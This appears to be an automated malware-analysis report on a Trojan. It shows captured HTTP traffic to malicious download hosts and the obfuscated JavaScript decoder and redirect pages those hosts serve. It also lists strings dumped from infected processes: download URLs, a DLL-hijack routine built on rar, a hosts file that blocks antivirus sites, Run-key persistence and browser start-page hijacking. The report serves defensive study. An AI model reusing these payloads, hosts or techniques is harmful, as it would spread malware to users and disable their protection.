){T=jNjP.charCodeAt(v)^77;m =String.fromCharCode(T^76);}return m;}function aswkdKO(){var r="46,62,114,114,103,118,106,100,120,60,120,56,107,56,53";return eval("String.fromCharCode(" r ")");}function mcjwbAN(){var r="107,53,104,52,53";return eval("String.fromCharCode(" r ")");}function mhdvkAT(){var uNlD = document.getElem
<<< skipped >>>
GET /.........rar?rhdkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.30wz.com
Connection: Keep-Alive
HTTP/1.0 200 OK
Content-Type: text/html
Content-Length: 82
Pragma: no-cache
Cache-control: no-store
<html><body><script>var bo="/........",co="djfz2",fo,do_=new Array(),eo;function zo(ao){for(fo=0;fo<eo.length;fo )do_[fo]=eo.charCodeAt(fo);fo=51;do{if(fo<4)break;do_[fo]=((do_[fo] do_[fo-1])&0xff)^94;fo--;}while(true);fo="fo=2;do{do_[fo]=(do_[fo]-do_[fo 1])&0xff;}while( fo<=50);";eval(fo);fo="fo=2;while(true){if(fo>49)break;do_[fo]=((~do_[fo])&0xff)^112;do_[fo]=(-do_[fo])&0xff;fo ;}";eval(fo);eo="";for(fo=1;fo<do_.length-1;fo )if(fo%6)eo =String.fromCharCode(do_[fo]^ao);fo=eval;fo(eo);}eo="_\x95\xb7\xbd\xdf\xb4\xdb].\x1az\x16j\xbf\x1c\xe2\x16\xde\x13\xc3\xc1\xd4\xbd\x8c\x8a\xedC\xee5\xeb\xa1\xa7\xa2\x9e\xd9\x96\xd7\x9e\x88W{L\x9f[\x97QA\xffx\xcfE\x9a\x8d4";zo(226);</script><script>var u=2;for(;u==1;u );</script><br><br><br><center><h3><p>..............................JavaScript</p></h3></center></body></html>HTTP/1.0 200 OK..Content-Type: text/html..Content-Length: 826.Pragma: no-cache..Cache-control: no-store..<html><body><script>var bo="/........",co="djfz2",fo,do_=new Array(),eo;function zo(ao){for(fo=0;fo<eo.length;fo )do_[fo]=eo.charCodeAt(fo);fo=51;do{if(fo<4)break;do_[fo]=((do_[fo] do_[fo-1])&0xff)^94;fo--;}while(true);fo="fo=2;do{do_[fo]=(do_[fo]-do_[fo 1])&0xff;}while( fo<=50);";eval(fo);fo="fo=2;while(true){if(fo>49)break;do_[fo]=((~do_[fo])&0xff)^112;do_[fo]=(-do_[fo])&0xff;fo ;}";eval(fo);eo="";for(fo=1;fo<do_.length-1;fo )if(fo%6)eo =Strin
<<< skipped >>>
GET /.........rar?rqrkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.30wz.com
Connection: Keep-Alive
HTTP/1.0 200 OK
Content-Type: text/html
Content-Length: 85
Pragma: no-cache
Cache-control: no-store
<html><body><script>var it="/........",jt="djfz2",mt,kt=new Array(),lt;function gt(ht){for(mt=0;mt<lt.length;mt )kt[mt]=lt.charCodeAt(mt);mt=49;do{if(mt<3)break;kt[mt]=((kt[mt] kt[mt-1])&0xff)^131;mt--;}while(true);for(mt=51;;){if(mt<1)break;kt[mt]=(kt[mt] kt[mt-1])&0xff;mt--;}mt="mt=49;do{kt[mt]=((((((kt[mt]-kt[mt-1])&0xff) 208)&0xff)<<7)&0xff)|(((((kt[mt]-kt[mt-1])&0xff) 208)&0xff)>>1);}while(--mt>=2);";eval(mt);lt="";for(mt=1;mt<kt.length-1;mt )if(mt%6)lt =String.fromCharCode(kt[mt]^ht);eval("mt=eval;mt(lt);");}lt="\x1a\xa3\x91\x0e\x8f\x85 \xa1\xfbA\xd8\xe9\x1b/\x88;\xf1I\xf0kG\xbf\xe8\x1d\xc75V/\xfb\xa7\x85\xbc\x19\xc7\x83\xde\xf1w\xc74\x91\x0f\xc6O\x17\x97\xf0I\x9b\x9d&z\xbe\x91";gt(202);</script><script>var u=2;for(;u==1;u );</script><br><br><br><center><h3><p>..............................JavaScript</p></h3></center></body></html>..
GET /.........rar?rbrkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 180.ghyyy.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: safeshield/v2
Content-Length: 768
Content-Type: text/html; charset=gb2312
Pragma: no-cache
Cache-control: no-store
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: Close
Set-Cookie: ssfwkey=actzmz
<script>function rrxbwVS(){var y="46,62,114,114,103,118,106,100,120,60,120,56,107,56,53";return eval("String.fromCharCode(" y ")");}function fykzrDK(tIzM){var b;var G;b="";for(var a=0;a<tIzM.length;a ){G=tIzM.charCodeAt(a)^15;b =String.fromCharCode(G^14);}return b;}function fbhvhWI(){var cEmV = document.getElementById("pVoM").value;var qPhY=rrxbwVS();window.location=fykzrDK(qPhY) cEmV;}function sgwdvJF(){var y="107,53,104,52,53";return eval("String.fromCharCode(" y ")");}</script><html><br><br><br><center><h3><font color="#3C3C3C">..............:</font><font color="blue"><script>var cAtE=sgwdvJF();document.write(fykzrDK(cAtE));</script> </font><input id="pVoM"> <input type=button value="................" onmouseup="fbhvhWI()"><br><br></h3><center></html>HTTP/1.1 200 OK..Server: safeshield/v2..Content-Length: 753..Content-Type: text/html; charset=gb2312..Pragma: no-cache..Cache-control: no-store..Expires: Thu, 01 Dec 1994 16:00:00 GMT..Connection: Close..Set-Cookie: ssfwkey=actzmz..<script>function nwcznTK(){var x="16,0,76,76,89,72,84,90,70,2,70,6,85,6,11";return eval("String.fromCharCode(" x ")");}function vzhssNW(){var kGnY = document.getElementById("rRaS").value;var gYgG=nwcznTK();window.location=twxhsZL(gYgG) kGnY;}function twxhsZL(mOjI){var s;var X;s="";for(var a=0;a<mOjI.length;a ){X=mOjI.charCodeAt(a)^32;s =String.fromCharCode(X^31);}return s;}function cgtziVX(){va
<<< skipped >>>
GET /.........rar?rqckm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 180.ghyyy.com
Connection: Keep-Alive
Cookie: ssfwkey=actzmz
HTTP/1.1 200 OK
Server: safeshield/v2
Content-Length: 768
Content-Type: text/html; charset=gb2312
Pragma: no-cache
Cache-control: no-store
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: Close
Set-Cookie: ssfwkey=actzmz
<script>function jvlloAB(iWlZ){var e;var X;e="";for(var m=0;m<iWlZ.length;m ){X=iWlZ.charCodeAt(m)^17;e =String.fromCharCode(X^16);}return e;}function fedavTX(){var k="46,62,114,114,103,118,106,100,120,60,120,56,107,56,53";return eval("String.fromCharCode(" k ")");}function mfofrCD(){var eBqV = document.getElementById("jPlK").value;var xCeM=fedavTX();window.location=jvlloAB(xCeM) eBqV;}function nzrqhXY(){var k="107,53,104,52,53";return eval("String.fromCharCode(" k ")");}</script><html><br><br><br><center><h3><font color="#3C3C3C">..............:</font><font color="blue"><script>var yGiK=nzrqhXY();document.write(jvlloAB(yGiK));</script> </font><input id="jPlK"> <input type=button value="................" onmouseup="mfofrCD()"><br><br></h3><center></html>..
GET /.........rar?rbrkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.86jfw.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 9337155
Content-Type: application/octet-stream
Last-Modified: Sun, 16 Nov 2014 12:36:11 GMT
Accept-Ranges: bytes
ETag: "7cee72e7991d01:29b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 17 Nov 2014 12:11:12 GMT
Connection: keep-alive
GET /.........rar?rbrkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 180.ghyyy.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: safeshield/v2
Content-Length: 768
Content-Type: text/html; charset=gb2312
Pragma: no-cache
Cache-control: no-store
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: Close
Set-Cookie: ssfwkey=actzmz
GET /.........rar?rbbkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 180.ghyyy.com
Connection: Keep-Alive
Cookie: ssfwkey=actzmz
HTTP/1.1 200 OK
Server: safeshield/v2
Content-Length: 753
Content-Type: text/html; charset=gb2312
Pragma: no-cache
Cache-control: no-store
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: Close
Set-Cookie: ssfwkey=actzmz
GET /.................rar?rbrkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.zz12320.com
Connection: Keep-Alive
HTTP/1.0 200 OK
Content-Type: text/html
Content-Length: 82
Pragma: no-cache
Cache-control: no-store
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
regsvr32.exe_1680:
.text
`.data
.rsrc
msvcrt.dll
ADVAPI32.dll
KERNEL32.dll
NTDLL.DLL
USER32.dll
ole32.dll
regsvr32.pdb
_wcmdln
RegCloseKey
RegOpenKeyExW
Excessive # of DLL's on cmdline
5.1.2600.5512 (xpsp.080413-2105)
REGSVR32.EXE
Windows
Operating System
5.1.2600.5512
Usage: regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname
Call DllInstall passing it an optional [cmdline]; when used with /u calls dll uninstall
Unrecognized flag: %1"Extra argument on command line: This command is only valid when an OLE Custom Control project is open.
LoadLibrary("%1") failed - ,%1 was loaded, but the %2 entry point was not found.
%1 does not appear to be a .DLL or .OCX file.V%1 was loaded, but the %2 entry point was not found.
OleUninitialize failed.["%1" is not an executable file and no registration
svchost.exe_592:
.text
`.rdata
@.data
.rsrc
ADVAPI32.dll
USER32.dll
GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm
RegCloseKey
RegOpenKeyExA
RegOpenKeyA
SHLWAPI.dll
ShellExecuteA
SHELL32.dll
WS2_32.dll
MSVCRT.dll
_acmdln
WinExec
KERNEL32.dll
0.0.0.0
hXXp://VVV.mojimojimojimoji.com/fuy733.html
192.168.200.113:8080
%u.%u.%u.%u
hra%u.dll
VVV.mojimojimojimoji.com:38774
192.168.200.113:1050
iexplore.exe
stf%c%c%c%c%c.exe
URLDownloadToFileA
urlmon.dll
%c%c%c%c%c.exe
PlusCtrl.dll
%c%c%c%c%c%c.exe
%u MB
%u MHz
Windows NT
Windows 7
Windows 2008
Windows Vista
Windows 2003
Windows XP
Windows 2000
SOFTWARE\Microsoft\Windows NT\CurrentVersion
\Program Files\Internet Explorer\iexplore.exe
#0%s!
%s/%s
GET %s HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)
Host: %s:%d
Host: %s
User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0
Referer: hXXp://%s:80/hXXp://%s
%s %s%s
User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)
User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
%d.%d.%d.%d
192.168.1.244
svchost.exe
ntdll.dll
@.reloc
lpk.dll
cmd /c RD /s /q "%s"
"%s" a -r -ep1"%s" "%s" "%s\lpk.dll"
"%s" x "%s" *.exe "%s\"
cmd /c %s vb "%s" lpk.dll|find /i "lpk.dll"
rar.exe
svchost.exe_592_rwx_00400000_0000C000:
.text
`.rdata
@.data
.rsrc
ADVAPI32.dll
USER32.dll
GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm
RegCloseKey
RegOpenKeyExA
RegOpenKeyA
SHLWAPI.dll
ShellExecuteA
SHELL32.dll
WS2_32.dll
MSVCRT.dll
_acmdln
WinExec
KERNEL32.dll
0.0.0.0
hXXp://VVV.mojimojimojimoji.com/fuy733.html
192.168.200.113:8080
%u.%u.%u.%u
hra%u.dll
VVV.mojimojimojimoji.com:38774
192.168.200.113:1050
iexplore.exe
stf%c%c%c%c%c.exe
URLDownloadToFileA
urlmon.dll
%c%c%c%c%c.exe
PlusCtrl.dll
%c%c%c%c%c%c.exe
%u MB
%u MHz
Windows NT
Windows 7
Windows 2008
Windows Vista
Windows 2003
Windows XP
Windows 2000
SOFTWARE\Microsoft\Windows NT\CurrentVersion
\Program Files\Internet Explorer\iexplore.exe
#0%s!
%s/%s
GET %s HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)
Host: %s:%d
Host: %s
User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0
Referer: hXXp://%s:80/hXXp://%s
%s %s%s
User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)
User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
%d.%d.%d.%d
192.168.1.244
svchost.exe
ntdll.dll
@.reloc
lpk.dll
cmd /c RD /s /q "%s"
"%s" a -r -ep1"%s" "%s" "%s\lpk.dll"
"%s" x "%s" *.exe "%s\"
cmd /c %s vb "%s" lpk.dll|find /i "lpk.dll"
rar.exe
kmokq.exe_1948:
.text
`.rdata
@.data
KERNEL32.dll
EnumWindows
USER32.dll
RegCloseKey
RegOpenKeyExA
ADVAPI32.dll
WS2_32.dll
MSVCP60.dll
MSVCRT.dll
DeleteUrlCacheEntry
WININET.dll
URLDownloadToFileA
urlmon.dll
SHLWAPI.dll
hXXp://623968.6600.org:99/3.htm
201405131714
124.232.158.160
dk.23145.com
Applications\iexplore.exe\SHELL\OPEN\COMMAND
hXXp://
%s?%c%c%c%c%c
%s%c%c%c%c%c.htm
hXXp://VVV.sfy365.com/1.78
hXXp://VVV.yao933.com/
124.232.141.61
QQExtrenal.exe_3124:
.text
`.data
.rsrc
MSVBVM60.DLL
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
127.0.0.1 localhost
127.0.0.1 VVV.ijinshan.com
127.0.0.1 VVV.360.cn
127.0.0.1 VVV.rising.com.cn
127.0.0.1 kaba365.com
xxD.Downloader
VB5!6&vb6chs.dll
D:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB
advapi32.dll
RegCreateKeyA
RegCloseKey
VBA6.DLL
c:\windows\system32\jarinet
cmd /c taskkill /f /im QQExtrenal.exe
hXXp://
%System%\drivers\etc\hosts
Microsoft.XMLHTTP
Adodb.Stream
c:\windows\inf\
Software\Microsoft\Windows\CurrentVersion\Run
c:\windows\system32\jarinet\QQExtrenal.exe
c:\windows\system32\jarinet\QQExtrenal.exe "
.exe"
xxDown.exe
comine.exe_3324:
.text
`.data
.rsrc
MSVBVM60.DLL
vb6chs.dll
d:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB
psapi.dll
kernel32.dll
NTDLL.DLL
shell32.dll
SHFileOperationA
ShellExecuteA
VBA6.DLL
1.vbp
hXXp://VVV.hao12338.com/?index
IEXPLORE.EXE|TTRAVELER.EXE|SOGOUEXPLORER.EXE|360SE.EXE|GREENBROWSER.EXE|FIREFOX.EXE|MAXTHON.EXE|THEWORLD.EXE|OPERA.EXE|CHROME.EXE|SAFARI.EXE|NETSCAPE.EXE
%Program Files%\Windows Media Player
%Program Files%
explorer.exe
WScript.Shell
Iexplore.exe
wscript.shell
cmd /c ping 127.0.0.1 -n 2&del
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows
%Program Files%\Windows Media Player\comine.exe
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page
%Program Files%\Internet Explorer\iexplore.exe
WindowStyle
Hotkey
serv.dat
news4979.exe_3348:
.text
`.data
.rsrc
MSVBVM60.DLL
WebBrowser2
SHDocVwCtl.WebBrowser
WebBrowser1
vb6chs.dll
shdocvw.dll
WebBrowser
4%System%\shdocvw.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
advapi32.dll
RegCreateKeyA
RegCloseKey
RegOpenKeyA
RegDeleteKeyA
shell32.dll
ShellExecuteA
psapi.dll
EnumWindows
psapi.dll
RegCreateKeyExA
RegOpenKeyExA
VBA6.DLL
hXXp:///
%Program Files%
@isual Studio\VB98\LINK.EXE.M
1.vbp
yyg.so
hXXp://96xx.net/tj2.html?1114
hXXp://wei.96xx.net/index.php?m=weixin&a=order&id=89
Chrome_WidgetWin
360se.exe
baidu.com
hao123.com
chrome.exe
sogouexplorer.exe
baidubrowser.exe
360chrome.exe
maxthon.exe
qqbrowser.exe
iexplore.exe
\Google Chrome.lnk
\Internet Explorer.lnk
wscript.shell
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Desktop
Wscript.shell
C:\Users\Public\Desktop\
C:\Users\Public\Desktop